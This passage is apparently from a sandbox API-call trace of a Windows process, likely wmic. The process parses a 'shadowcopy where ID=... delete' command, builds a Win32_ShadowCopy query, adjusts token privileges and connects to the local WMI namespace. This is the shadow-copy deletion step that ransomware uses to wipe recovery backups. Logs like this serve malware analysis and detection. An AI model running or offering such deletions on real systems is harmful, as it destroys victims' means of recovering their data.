Win32_ShadowCopy") returned 30 [0093.578] malloc (_Size=0x18) returned 0x4acbe0 [0093.579] IWbemClassObject:Get (in: This=0x1e604e0, wszName="PWhere", lFlags=0, pVal=0x16f880*(varType=0x0, wReserved1=0xff2d, wReserved2=0x0, wReserved3=0x0, varVal1=0x21e298, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x16f880*(varType=0x8, wReserved1=0xff2d, wReserved2=0x0, wReserved3=0x0, varVal1=" Where ID = '#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0093.579] free (_Block=0x4acbe0) [0093.579] lstrlenW (lpString=" Where ID = '#'") returned 15 [0093.579] malloc (_Size=0x20) returned 0x4acff0 [0093.579] lstrlenW (lpString=" Where ID = '#'") returned 15 [0093.579] malloc (_Size=0x18) returned 0x4acbe0 [0093.579] IWbemClassObject:Get (in: This=0x1e604e0, wszName="Connection", lFlags=0, pVal=0x16f880*(varType=0x0, wReserved1=0xff2d, wReserved2=0x0, wReserved3=0x0, varVal1=0x26bd68, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x16f880*(varType=0xd, wReserved1=0xff2d, wReserved2=0x0, wReserved3=0x0, varVal1=0x1e609c0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0093.579] free (_Block=0x4acbe0) [0093.579] IUnknown:QueryInterface (in: This=0x1e609c0, riid=0xff267360*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x16f870 | out: ppvObject=0x16f870*=0x1e609c0) returned 0x0 [0093.580] GetCurrentThreadId () returned 0x9dc [0093.580] ??0CHString@@QEAA@XZ () returned 0x16f798 [0093.580] malloc (_Size=0x18) returned 0x4acbe0 [0093.580] IWbemClassObject:Get (in: This=0x1e609c0, wszName="Namespace", lFlags=0, pVal=0x16f7c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff27738f, varVal2=0x4acbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x16f7c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x4acbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0093.580] free (_Block=0x4acbe0) [0093.580] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0093.580] malloc (_Size=0x16) returned 0x4acbe0 [0093.580] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0093.580] malloc (_Size=0x18) returned 0x4acae0 [0093.580] IWbemClassObject:Get (in: This=0x1e609c0, wszName="Locale", lFlags=0, pVal=0x16f7c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x29a648, varVal2=0x4acbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x16f7c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x4acbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0093.580] free (_Block=0x4acae0) [0093.580] lstrlenW (lpString="ms_409") returned 6 [0093.580] malloc (_Size=0xe) returned 0x4acae0 [0093.581] lstrlenW (lpString="ms_409") returned 6 [0093.581] malloc (_Size=0x18) returned 0x4acb80 [0093.581] IWbemClassObject:Get (in: This=0x1e609c0, wszName="User", lFlags=0, pVal=0x16f7c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x29a648, varVal2=0x4acbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x16f7c0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x29a648, varVal2=0x4acbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0093.581] free (_Block=0x4acb80) [0093.581] malloc (_Size=0x18) returned 0x4acb80 [0093.581] IWbemClassObject:Get (in: This=0x1e609c0, wszName="Password", lFlags=0, pVal=0x16f7c0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x29a648, varVal2=0x4acbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x16f7c0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x29a648, varVal2=0x4acbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0093.581] free (_Block=0x4acb80) [0093.581] malloc (_Size=0x18) returned 0x4acb80 [0093.581] IWbemClassObject:Get (in: This=0x1e609c0, wszName="Server", lFlags=0, pVal=0x16f7c0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x29a648, varVal2=0x4acbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x16f7c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x4acbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0093.581] free (_Block=0x4acb80) [0093.581] lstrlenW (lpString=".") returned 1 [0093.581] malloc (_Size=0x4) returned 0x4a7140 [0093.582] lstrlenW (lpString=".") returned 1 [0093.582] malloc (_Size=0x18) returned 0x4acb80 [0093.582] IWbemClassObject:Get (in: This=0x1e609c0, wszName="Authority", lFlags=0, pVal=0x16f7c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x29a648, varVal2=0x4acbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x16f7c0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x29a648, varVal2=0x4acbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0093.582] free (_Block=0x4acb80) [0093.582] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0093.582] IUnknown:Release (This=0x1e609c0) returned 0x1 [0093.582] GetCurrentThreadId () returned 0x9dc [0093.582] ??0CHString@@QEAA@XZ () returned 0x16f798 [0093.582] malloc (_Size=0x18) returned 0x4acb80 [0093.582] IWbemClassObject:Get (in: This=0x1e604e0, wszName="__RELPATH", lFlags=0, pVal=0x16f7c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x29a648, varVal2=0xd), pType=0x0, plFlavor=0x0 | out: pVal=0x16f7c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"ShadowCopy\"", varVal2=0xd), pType=0x0, plFlavor=0x0) returned 0x0 [0093.582] free (_Block=0x4acb80) [0093.582] malloc (_Size=0x18) returned 0x4acb80 [0093.583] GetCurrentThreadId () returned 0x9dc [0093.583] ??0CHString@@QEAA@XZ () returned 0x16f618 [0093.583] ??0CHString@@QEAA@PEBG@Z () returned 0x16f630 [0093.583] ??0CHString@@QEAA@AEBV0@@Z () returned 0x16f5c0 [0093.583] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0093.583] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x4ad020 [0093.583] ?Find@CHString@@QEBAHPEBG@Z () returned 0x1b [0093.583] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x16f580 [0093.583] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x16f5c8 [0093.583] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x16f630 [0093.583] ??1CHString@@QEAA@XZ () returned 0x753b4501 [0093.583] ??1CHString@@QEAA@XZ () returned 0x753b4501 [0093.583] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x16f588 [0093.583] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x16f5c0 [0093.583] ??1CHString@@QEAA@XZ () returned 0x1 [0093.583] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x4ad090 [0093.583] ?Find@CHString@@QEBAHPEBG@Z () returned 0xa [0093.584] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x16f580 [0093.584] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x16f5c8 [0093.584] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x16f630 [0093.584] ??1CHString@@QEAA@XZ () returned 0x753b4501 [0093.584] ??1CHString@@QEAA@XZ () returned 0x753b4501 [0093.584] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x16f588 [0093.584] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x16f5c0 [0093.584] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0093.584] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x7fef4af4820 [0093.584] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0093.584] malloc (_Size=0x18) returned 0x4acba0 [0093.584] malloc (_Size=0x18) returned 0x4acc00 [0093.585] malloc (_Size=0x18) returned 0x4acc20 [0093.585] malloc (_Size=0x18) returned 0x4acc40 [0093.585] malloc (_Size=0x18) returned 0x4acc60 [0093.585] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0093.585] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0093.585] malloc (_Size=0x18) returned 0x4acc80 [0093.585] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0093.585] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x29 [0093.585] malloc (_Size=0x18) returned 0x4acca0 [0093.585] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x7c [0093.585] SysStringLen (param_1="\"") returned 0x1 [0093.586] free (_Block=0x4acc80) [0093.586] free (_Block=0x4acc60) [0093.586] free (_Block=0x4acc40) [0093.586] free (_Block=0x4acc20) [0093.586] free (_Block=0x4acc00) [0093.586] free (_Block=0x4acba0) [0093.586] IWbemServices:GetObject (in: This=0x1e53b28, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"\"", lFlags=0, pCtx=0x0, ppObject=0x16f608*=0x0, ppCallResult=0x0 | out: ppObject=0x16f608*=0x1e60a50, ppCallResult=0x0) returned 0x0 [0093.588] malloc (_Size=0x18) returned 0x4acba0 [0093.588] IWbemClassObject:Get (in: This=0x1e60a50, wszName="Text", lFlags=0, pVal=0x16f640*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff2d2ac0, varVal2=0x18), pType=0x0, plFlavor=0x0 | out: pVal=0x16f640*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x294aa0*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x21e030, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x18), pType=0x0, plFlavor=0x0) returned 0x0 [0093.588] free (_Block=0x4acba0) [0093.588] SafeArrayGetLBound (in: psa=0x294aa0, nDim=0x1, plLbound=0x16f620 | out: plLbound=0x16f620) returned 0x0 [0093.588] SafeArrayGetUBound (in: psa=0x294aa0, nDim=0x1, plUbound=0x16f610 | out: plUbound=0x16f610) returned 0x0 [0093.588] SafeArrayGetElement (in: psa=0x294aa0, rgIndices=0x16f604, pv=0x16f658 | out: pv=0x16f658) returned 0x0 [0093.588] malloc (_Size=0x18) returned 0x4acba0 [0093.588] malloc (_Size=0x18) returned 0x4acc00 [0093.588] SysStringLen (param_1="Shadow copy management.") returned 0x17 [0093.588] free (_Block=0x4acba0) [0093.588] IUnknown:Release (This=0x1e60a50) returned 0x0 [0093.589] free (_Block=0x4acca0) [0093.589] ??1CHString@@QEAA@XZ () returned 0x753b4501 [0093.589] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0093.589] free (_Block=0x4acb80) [0093.589] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0093.589] lstrlenW (lpString="Shadow copy management.") returned 23 [0093.589] malloc (_Size=0x30) returned 0x4a85c0 [0093.589] lstrlenW (lpString="Shadow copy management.") returned 23 [0093.589] free (_Block=0x4acc00) [0093.589] IUnknown:Release (This=0x1e604e0) returned 0x0 [0093.589] free (_Block=0x4acbc0) [0093.589] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0093.589] lstrlenW (lpString="PATH") returned 4 [0093.589] lstrlenW (lpString="where") returned 5 [0093.589] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="PATH", cchCount2=4) returned 3 [0093.590] lstrlenW (lpString="WHERE") returned 5 [0093.590] lstrlenW (lpString="where") returned 5 [0093.590] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0093.590] lstrlenW (lpString="/") returned 1 [0093.590] lstrlenW (lpString="ID='{51FFEAE1-0810-4889-92A9-E72417EBFA41}'") returned 43 [0093.590] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ID='{51FFEAE1-0810-4889-92A9-E72417EBFA41}'", cchCount1=43, lpString2="/", cchCount2=1) returned 3 [0093.590] lstrlenW (lpString="-") returned 1 [0093.590] lstrlenW (lpString="ID='{51FFEAE1-0810-4889-92A9-E72417EBFA41}'") returned 43 [0093.590] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ID='{51FFEAE1-0810-4889-92A9-E72417EBFA41}'", cchCount1=43, lpString2="-", cchCount2=1) returned 3 [0093.590] lstrlenW (lpString="ID='{51FFEAE1-0810-4889-92A9-E72417EBFA41}'") returned 43 [0093.590] malloc (_Size=0x58) returned 0x4ad020 [0093.590] lstrlenW (lpString="ID='{51FFEAE1-0810-4889-92A9-E72417EBFA41}'") returned 43 [0093.590] lstrlenW (lpString="/") returned 1 [0093.590] lstrlenW (lpString="delete") returned 6 [0093.590] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0093.590] lstrlenW (lpString="-") returned 1 [0093.590] lstrlenW (lpString="delete") returned 6 [0093.590] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0093.590] lstrlenW (lpString="delete") returned 6 [0093.590] malloc (_Size=0xe) returned 0x4acbc0 [0093.590] lstrlenW (lpString="delete") returned 6 [0093.590] lstrlenW (lpString="GET") returned 3 [0093.590] lstrlenW (lpString="delete") returned 6 [0093.590] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0093.591] lstrlenW (lpString="LIST") returned 4 [0093.591] lstrlenW (lpString="delete") returned 6 [0093.591] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0093.591] lstrlenW (lpString="SET") returned 3 [0093.591] lstrlenW (lpString="delete") returned 6 [0093.591] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0093.591] lstrlenW (lpString="CREATE") returned 6 [0093.591] lstrlenW (lpString="delete") returned 6 [0093.591] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0093.591] lstrlenW (lpString="CALL") returned 4 [0093.591] lstrlenW (lpString="delete") returned 6 [0093.591] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0093.591] lstrlenW (lpString="ASSOC") returned 5 [0093.591] lstrlenW (lpString="delete") returned 6 [0093.591] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0093.591] lstrlenW (lpString="DELETE") returned 6 [0093.591] lstrlenW (lpString="delete") returned 6 [0093.591] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0093.591] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0093.591] malloc (_Size=0x3e) returned 0x4ad080 [0093.591] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0093.591] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff20 | out: _String="Select", _Context=0xffffffffffffff20) returned="Select" [0093.592] malloc (_Size=0x18) returned 0x4acc00 [0093.592] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x0 | out: _String=0x0, _Context=0x0) returned="*" [0093.592] lstrlenW (lpString="FROM") returned 4 [0093.592] lstrlenW (lpString="*") returned 1 [0093.592] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0093.592] malloc (_Size=0x18) returned 0x4acb80 [0093.592] free (_Block=0x4acc00) [0093.592] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3b00760009 | out: _String=0x0, _Context=0x3b00760009) returned="from" [0093.592] lstrlenW (lpString="FROM") returned 4 [0093.592] lstrlenW (lpString="from") returned 4 [0093.592] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0093.592] malloc (_Size=0x18) returned 0x4acc00 [0093.592] free (_Block=0x4acb80) [0093.592] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3c00760009 | out: _String=0x0, _Context=0x3c00760009) returned="Win32_ShadowCopy" [0093.592] malloc (_Size=0x18) returned 0x4acb80 [0093.592] free (_Block=0x4acc00) [0093.592] free (_Block=0x4ad080) [0093.592] free (_Block=0x4acb80) [0093.592] lstrlenW (lpString="SET") returned 3 [0093.592] lstrlenW (lpString="delete") returned 6 [0093.592] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0093.593] lstrlenW (lpString="CREATE") returned 6 [0093.593] lstrlenW (lpString="delete") returned 6 [0093.593] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0093.593] free (_Block=0x4acef0) [0093.593] malloc (_Size=0x8) returned 0x4a6f20 [0093.593] lstrlenW (lpString="GET") returned 3 [0093.593] lstrlenW (lpString="delete") returned 6 [0093.593] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0093.593] lstrlenW (lpString="LIST") returned 4 [0093.593] lstrlenW (lpString="delete") returned 6 [0093.593] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0093.593] lstrlenW (lpString="ASSOC") returned 5 [0093.593] lstrlenW (lpString="delete") returned 6 [0093.593] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0093.593] WbemLocator:IUnknown:AddRef (This=0x1e41390) returned 0x3 [0093.593] free (_Block=0x2fdfb0) [0093.593] lstrlenW (lpString="") returned 0 [0093.593] lstrlenW (lpString="XDUWTFONO") returned 9 [0093.593] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0093.593] lstrlenW (lpString="XDUWTFONO") returned 9 [0093.593] malloc (_Size=0x14) returned 0x4acb80 [0093.593] lstrlenW (lpString="XDUWTFONO") returned 9 [0093.593] GetCurrentThreadId () returned 0x9dc [0093.593] GetCurrentProcess () returned 0xffffffffffffffff [0093.593] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x16f9e0 | out: TokenHandle=0x16f9e0*=0x27c) returned 1 [0093.594] GetTokenInformation (in: TokenHandle=0x27c, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x16f9d8 | out: TokenInformation=0x0, ReturnLength=0x16f9d8) returned 0 [0093.594] malloc (_Size=0x118) returned 0x4ad080 [0093.594] GetTokenInformation (in: TokenHandle=0x27c, TokenInformationClass=0x3, TokenInformation=0x4ad080, TokenInformationLength=0x118, ReturnLength=0x16f9d8 | out: TokenInformation=0x4ad080, ReturnLength=0x16f9d8) returned 1 [0093.594] AdjustTokenPrivileges (in: TokenHandle=0x27c, DisableAllPrivileges=0, NewState=0x4ad080*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=-1808054352, Attributes=0x68b0), (Luid.LowPart=0x0, Luid.HighPart=4902640, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0093.594] free (_Block=0x4ad080) [0093.594] CloseHandle (hObject=0x27c) returned 1 [0093.594] lstrlenW (lpString="GET") returned 3 [0093.594] lstrlenW (lpString="delete") returned 6 [0093.594] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0093.594] lstrlenW (lpString="LIST") returned 4 [0093.594] lstrlenW (lpString="delete") returned 6 [0093.594] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0093.594] lstrlenW (lpString="SET") returned 3 [0093.594] lstrlenW (lpString="delete") returned 6 [0093.594] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0093.594] lstrlenW (lpString="CALL") returned 4 [0093.594] lstrlenW (lpString="delete") returned 6 [0093.594] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0093.594] lstrlenW (lpString="ASSOC") returned 5 [0093.594] lstrlenW (lpString="delete") returned 6 [0093.594] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0093.594] lstrlenW (lpString="CREATE") returned 6 [0093.595] lstrlenW (lpString="delete") returned 6 [0093.595] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0093.595] lstrlenW (lpString="DELETE") returned 6 [0093.595] lstrlenW (lpString="delete") returned 6 [0093.595] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0093.595] malloc (_Size=0x18) returned 0x4acc00 [0093.595] lstrlenA (lpString="") returned 0 [0093.595] malloc (_Size=0x2) returned 0x2fdfb0 [0093.595] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff26314c, cbMultiByte=-1, lpWideCharStr=0x2fdfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0093.595] free (_Block=0x2fdfb0) [0093.595] malloc (_Size=0x18) returned 0x4acca0 [0093.595] lstrlenA (lpString="") returned 0 [0093.595] malloc (_Size=0x2) returned 0x2fdfb0 [0093.595] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff26314c, cbMultiByte=-1, lpWideCharStr=0x2fdfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0093.595] free (_Block=0x2fdfb0) [0093.595] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0093.595] malloc (_Size=0x3e) returned 0x4ad080 [0093.595] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0093.595] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff20 | out: _String="Select", _Context=0xffffffffffffff20) returned="Select" [0093.595] malloc (_Size=0x18) returned 0x4acba0 [0093.596] free (_Block=0x4acca0) [0093.596] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3f006e0007 | out: _String=0x0, _Context=0x3f006e0007) returned="*" [0093.596] lstrlenW (lpString="FROM") returned 4 [0093.596] lstrlenW (lpString="*") returned 1 [0093.596] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0093.596] malloc (_Size=0x18) returned 0x4acca0 [0093.596] free (_Block=0x4acba0) [0093.596] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x40006e0007 | out: _String=0x0, _Context=0x40006e0007) returned="from" [0093.596] lstrlenW (lpString="FROM") returned 4 [0093.596] lstrlenW (lpString="from") returned 4 [0093.596] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0093.596] malloc (_Size=0x18) returned 0x4acba0 [0093.596] free (_Block=0x4acca0) [0093.596] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x41006e0007 | out: _String=0x0, _Context=0x41006e0007) returned="Win32_ShadowCopy" [0093.596] malloc (_Size=0x18) returned 0x4acca0 [0093.596] free (_Block=0x4acba0) [0093.596] free (_Block=0x4ad080) [0093.596] malloc (_Size=0x18) returned 0x4acba0 [0093.596] malloc (_Size=0x18) returned 0x4acc20 [0093.597] malloc (_Size=0x18) returned 0x4acc40 [0093.597] malloc (_Size=0x18) returned 0x4acc60 [0093.597] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0093.597] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0093.597] malloc (_Size=0x18) returned 0x4acc80 [0093.597] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy") returned 0x1e [0093.597] SysStringLen (param_1=" WHERE ") returned 0x7 [0093.597] malloc (_Size=0x18) returned 0x4accc0 [0093.597] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy WHERE ") returned 0x25 [0093.597] SysStringLen (param_1="ID='{51FFEAE1-0810-4889-92A9-E72417EBFA41}'") returned 0x2b [0093.597] free (_Block=0x4acc00) [0093.597] free (_Block=0x4acc80) [0093.597] free (_Block=0x4acc60) [0093.597] free (_Block=0x4acc40) [0093.598] free (_Block=0x4acc20) [0093.598] free (_Block=0x4acba0) [0093.598] ??0CHString@@QEAA@XZ () returned 0x16f950 [0093.598] GetCurrentThreadId () returned 0x9dc [0093.598] malloc (_Size=0x18) returned 0x4acba0 [0093.598] malloc (_Size=0x18) returned 0x4acc20 [0093.598] malloc (_Size=0x18) returned 0x4acc40 [0093.598] malloc (_Size=0x18) returned 0x4acc60 [0093.598] malloc (_Size=0x18) returned 0x4acc80 [0093.598] SysStringLen (param_1="\\\\") returned 0x2 [0093.598] SysStringLen (param_1="XDUWTFONO") returned 0x9 [0093.598] malloc (_Size=0x18) returned 0x4acc00 [0093.598] SysStringLen (param_1="\\\\XDUWTFONO") returned 0xb [0093.598] SysStringLen (param_1="\\") returned 0x1 [0093.598] malloc (_Size=0x18) returned 0x4acce0 [0093.599] SysStringLen (param_1="\\\\XDUWTFONO\\") returned 0xc [0093.599] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0093.599] free (_Block=0x4acc00) [0093.599] free (_Block=0x4acc80) [0093.599] free (_Block=0x4acc60) [0093.599] free (_Block=0x4acc40) [0093.599] free (_Block=0x4acc20) [0093.599] free (_Block=0x4acba0) [0093.599] malloc (_Size=0x18) returned 0x4acba0 [0093.599] malloc (_Size=0x18) returned 0x4acc20 [0093.599] malloc (_Size=0x18) returned 0x4acc40 [0093.599] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1e41390, strNetworkResource="\\\\XDUWTFONO\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff2d29d0 | out: ppNamespace=0xff2d29d0*=0x1e53c18) returned 0x0 [0093.605] free (_Block=0x4acc40) [0093.605] free (_Block=0x4acc20) [0093.605] free (_Block=0x4acba0) [0093.605] 